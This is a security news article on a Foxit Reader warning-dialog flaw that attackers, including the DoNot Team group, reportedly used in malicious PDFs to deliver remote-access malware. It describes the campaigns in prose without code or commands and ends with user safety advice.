A critical security flaw in Foxit Reader, a lesser-known PDF viewer, has been exploited by cybercriminals to trick users into executing malicious code, potentially compromising their systems and data. The flaw lies in the design of the warning messages presented to users, with a default “OK” option that can easily deceive unsuspecting individuals into clicking it without fully understanding the consequences.
The exploit allows attackers to remotely download and execute malicious code, granting them unauthorized access to the victim’s device. This vulnerability has been actively exploited in real-world attacks for malicious purposes such as espionage and e-crime.
Recent reports suggest that an advanced persistent threat group known as APT-C-35 (DoNot Team) is behind a major exploit campaign targeting both Windows and Android users. The attackers utilize the PDF exploit to deploy various malware families, including VenomRAT, Agent-Tesla, Remcos, NjRAT, NanoCore RAT, Pony, Xworm, AsyncRAT, and DCRat. These malware variants enable cybercriminals to control compromised devices and potentially bypass two-factor authentication (2FA) mechanisms, posing a serious threat to users’ security and privacy.
Researchers at Check Point Research have uncovered an attack campaign, possibly distributed through Facebook, that utilizes a multi-stage attack chain. The campaign involves clicking a malicious link that leads to the installation of an information stealer and two cryptocurrency miners on the victim’s machine.
In another incident, a threat actor known as @silentkillertv was found to be using two linked PDF files, one hosted on the legitimate website Trello, to deliver malware. This actor was also observed selling malicious tools and advertising the exploit on April 27th, highlighting the growing trend of cybercriminals leveraging PDF vulnerabilities for malicious purposes.
Furthermore, researchers have identified builder tools used by attackers to generate malicious PDFs exploiting the Foxit Reader vulnerability. These PDFs primarily deliver PowerShell payloads by downloading them from a remote server and executing them on the target machine. The flexibility of these builder tools indicates a wide range of commands that attackers can leverage to carry out their malicious activities.
Unlike traditional exploits that target well-known software like Adobe Reader, this exploit in Foxit Reader relies heavily on social engineering tactics to manipulate users into clicking “OK” on permission pop-ups. This technique has evaded detection for years due to the focus of security solutions on more popular PDF viewers, allowing malicious PDFs to be distributed easily and circumvent traditional security measures.
Foxit has acknowledged the issue and plans to address it in a future update. In the meantime, users are advised to exercise caution when opening PDF files and to avoid clicking on suspicious links or pop-ups. Keeping software and security solutions up to date is crucial to protect against emerging threats and vulnerabilities in the cyber landscape.